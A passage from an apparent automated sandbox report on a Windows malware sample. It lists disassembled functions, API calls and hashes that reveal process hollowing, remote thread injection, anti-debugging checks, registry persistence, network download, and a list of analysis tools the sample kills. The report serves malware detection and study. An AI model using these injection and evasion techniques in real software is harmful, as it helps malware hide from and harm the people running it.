                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e100d8103b68b422bfc8a5689cfe0c77aa94b21dc195a0258a936a93391890d3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A612E32918B4391F764A721EA553BB2AA9BFA4301F400136D54EC66D1DE3FE50BC61A
                                                                                                                                                                                                                        Function 00007FF6EC8440B0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction ID: 87e2ffc3c5e7e4ac6ab0528e7e26bd07cc2ffe93b1da4438080849b62adb163c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7311632618A81C6E750DB15E95072BBBA5FBD4784F105035FA8E83B68DF7ED442CB05
                                                                                                                                                                                                                        Function 00007FF6EC8431B8 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction ID: 020a449c04c7f749266065e615c53b31e01a470b47a491aa0173b0eed9e9bb94
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38F05E2290C283C1E7305B24960833B2FA8BB56709F140174E29DC6694DF2ED50BDB1B
                                                                                                                                                                                                                        Function 00007FF6EC8441F0 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction ID: 4f972b889f2f6c5386a18b8b65e73be04fa4b43b98355756b41da0675e166664
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF0303690CB41D2EA606B20E50437F6B79FB96704F501539D98EC3654CF2ED407D606
                                                                                                                                                                                                                        Function 00007FF6EC8414EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 328 7ff6ec8414ec-7ff6ec841528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 0f6921b25e82d0f1a1fad9f77aa49d0e77a40230a9075f2808917d8fcca0e5bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34E09276518F80C6C6209B15F84011ABBB4FBC8795F504125EACD82B28CF3DC165CB04
                                                                                                                                                                                                                        Function 00007FF6EC843AF0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 329 7ff6ec843af0-7ff6ec843aff 330 7ff6ec843b01-7ff6ec843b0e VirtualFree 329->330 331 7ff6ec843b14-7ff6ec843b18 329->331 330->331
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction ID: 6b2fed92b810ea9eed5a3589f44d65be96f35e74a4f56a090832c87021cda841
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3D01222F38A81C1EB94DB26E989716A6A4FBC4784F508035E68981664CF3DC09ACF05

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF6EC8424D8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 332 7ff6ec8424d8-7ff6ec842552 GetModuleFileNameW 333 7ff6ec842559-7ff6ec842595 332->333 334 7ff6ec842554 332->334 336 7ff6ec842597-7ff6ec84259f 333->336 337 7ff6ec8425ad-7ff6ec8425c9 call 7ff6ec842418 333->337 335 7ff6ec842dfd-7ff6ec842e05 334->335 338 7ff6ec8425cb-7ff6ec8425e7 call 7ff6ec842458 336->338 339 7ff6ec8425a1-7ff6ec8425a9 336->339 346 7ff6ec84260c-7ff6ec842616 337->346 338->346 341 7ff6ec8425e9-7ff6ec842605 call 7ff6ec842498 339->341 342 7ff6ec8425ab-7ff6ec842607 339->342 341->346 342->335 350 7ff6ec842618 346->350 351 7ff6ec84261d-7ff6ec842671 CreateProcessW 346->351 350->335 352 7ff6ec842678-7ff6ec8426b8 CreateFileW 351->352 353 7ff6ec842673 351->353 354 7ff6ec8426ba 352->354 355 7ff6ec8426bf-7ff6ec8426db GetFileSize 352->355 353->335 354->335 356 7ff6ec8426e7-7ff6ec8426f2 CloseHandle 355->356 357 7ff6ec8426dd-7ff6ec8426e5 355->357 356->335 357->356 358 7ff6ec8426f7-7ff6ec84271f VirtualAlloc 357->358 359 7ff6ec842731-7ff6ec84275c ReadFile 358->359 360 7ff6ec842721-7ff6ec84272c CloseHandle 358->360 361 7ff6ec842781-7ff6ec8427cf CloseHandle GetThreadContext 359->361 362 7ff6ec84275e-7ff6ec84277c VirtualFree CloseHandle 359->362 360->335 363 7ff6ec8427e9-7ff6ec84286e ReadProcessMemory GetModuleHandleA GetProcAddress 361->363 364 7ff6ec8427d1-7ff6ec8427e4 VirtualFree 361->364 362->335 366 7ff6ec842888-7ff6ec8428f1 VirtualAllocEx 363->366 367 7ff6ec842870-7ff6ec842883 VirtualFree 363->367 364->335 368 7ff6ec84290b-7ff6ec84293f WriteProcessMemory 366->368 369 7ff6ec8428f3-7ff6ec842906 VirtualFree 366->369 367->335 370 7ff6ec842959-7ff6ec842964 368->370 371 7ff6ec842941-7ff6ec842954 VirtualFree 368->371 369->335 372 7ff6ec842976-7ff6ec842989 370->372 371->335 373 7ff6ec842a37-7ff6ec842a7e 372->373 374 7ff6ec84298f-7ff6ec842a18 WriteProcessMemory 372->374 377 7ff6ec842a90-7ff6ec842aa3 373->377 375 7ff6ec842a1a-7ff6ec842a2d VirtualFree 374->375 376 7ff6ec842a32 374->376 375->335 376->372 379 7ff6ec842aa9-7ff6ec842af8 RtlCompareMemory 377->379 380 7ff6ec842d28-7ff6ec842dac WriteProcessMemory SetThreadContext 377->380 381 7ff6ec842afc-7ff6ec842b25 379->381 382 7ff6ec842afa 379->382 383 7ff6ec842dae-7ff6ec842dc1 VirtualFree 380->383 384 7ff6ec842dc3-7ff6ec842dd3 ResumeThread 380->384 386 7ff6ec842b30-7ff6ec842b3e 381->386 382->377 383->335 387 7ff6ec842dea-7ff6ec842df7 VirtualFree 384->387 388 7ff6ec842dd5-7ff6ec842de8 VirtualFree 384->388 389 7ff6ec842b44-7ff6ec842bcf 386->389 390 7ff6ec842d23 386->390 387->335 388->335 391 7ff6ec842be1-7ff6ec842bef 389->391 390->380 392 7ff6ec842d1e 391->392 393 7ff6ec842bf5-7ff6ec842c28 391->393 392->386 394 7ff6ec842c2c-7ff6ec842cff ReadProcessMemory WriteProcessMemory 393->394 395 7ff6ec842c2a 393->395 397 7ff6ec842d19 394->397 398 7ff6ec842d01-7ff6ec842d14 VirtualFree 394->398 395->391 397->392 398->335
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction ID: cc9eef958a172fe09b6d52d6ceadace607002ce8a064c7cfc29a111e5f967ad8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE32E03260CBC586E774CB16E9543AAABA5FB88B85F004136DA8EC3B58DF3DD445CB05
                                                                                                                                                                                                                        Function 00007FF6EC8410D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: eab237a8e4218a1a06cc4ef6636c4c2e9c4e7e3ed8971b59760cf36e8185ddfd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB711A32A0CA8186E770CB14E58436BBBA9FB84784F504135E68DC7B98DF7DD48ACB45
                                                                                                                                                                                                                        Function 00007FF6EC84216C Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6EC8421A9
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction ID: 872afbeebd08eb598dc0a222a75bb0fef936b2a50244f53270eef4e9deb2b9e3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE71D53261CB81C2E7549B54F59432FBBA4FBC4B94F101036EA8A83A68CF7ED485CB05
                                                                                                                                                                                                                        Function 00007FF6EC844530 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction ID: d321155a558c9a28b9718e92a8deedaa7a3e554f9620e0b01334aebfa7dfd27a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E881F736608B8182EA50CB55F98436BBBA5FBC9B95F104136EA8DC3B68DF3DD045CB05
                                                                                                                                                                                                                        Function 00007FF6EC843078 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844410: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430B3), ref: 00007FF6EC844458
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844410: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430B3), ref: 00007FF6EC844495
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844410: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430B3), ref: 00007FF6EC8444A0
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B50: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430B8), ref: 00007FF6EC843B93
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B50: RegSetValueExW.ADVAPI32 ref: 00007FF6EC843BC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B50: RegCloseKey.ADVAPI32 ref: 00007FF6EC843BD8
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843BF0: RegDeleteKeyW.ADVAPI32 ref: 00007FF6EC843C08
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6EC843E03
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: Process32FirstW.KERNEL32 ref: 00007FF6EC843E36
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: CloseHandle.KERNEL32 ref: 00007FF6EC843E48
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: wcscmp.MSVCRT ref: 00007FF6EC843E5D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: OpenProcess.KERNEL32 ref: 00007FF6EC843E73
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: TerminateProcess.KERNEL32 ref: 00007FF6EC843E96
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: CloseHandle.KERNEL32 ref: 00007FF6EC843EA4
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: Process32NextW.KERNEL32 ref: 00007FF6EC843EB7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DF0: CloseHandle.KERNEL32 ref: 00007FF6EC843EC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843980: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6EC843AD8), ref: 00007FF6EC8439B0
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6EC843162
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction ID: 58f6c3c41595f526ce851bafd8244c928f7972de593fd8e5309e3738646f8642
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F219726A2890291EA00FB60DA927FB2B6DBF60751F900131D51DC32E2DE6FE507C35B
                                                                                                                                                                                                                        Function 00007FF6EC843890 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843750
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: wsprintfW.USER32 ref: 00007FF6EC84386E
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438D9
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438EE
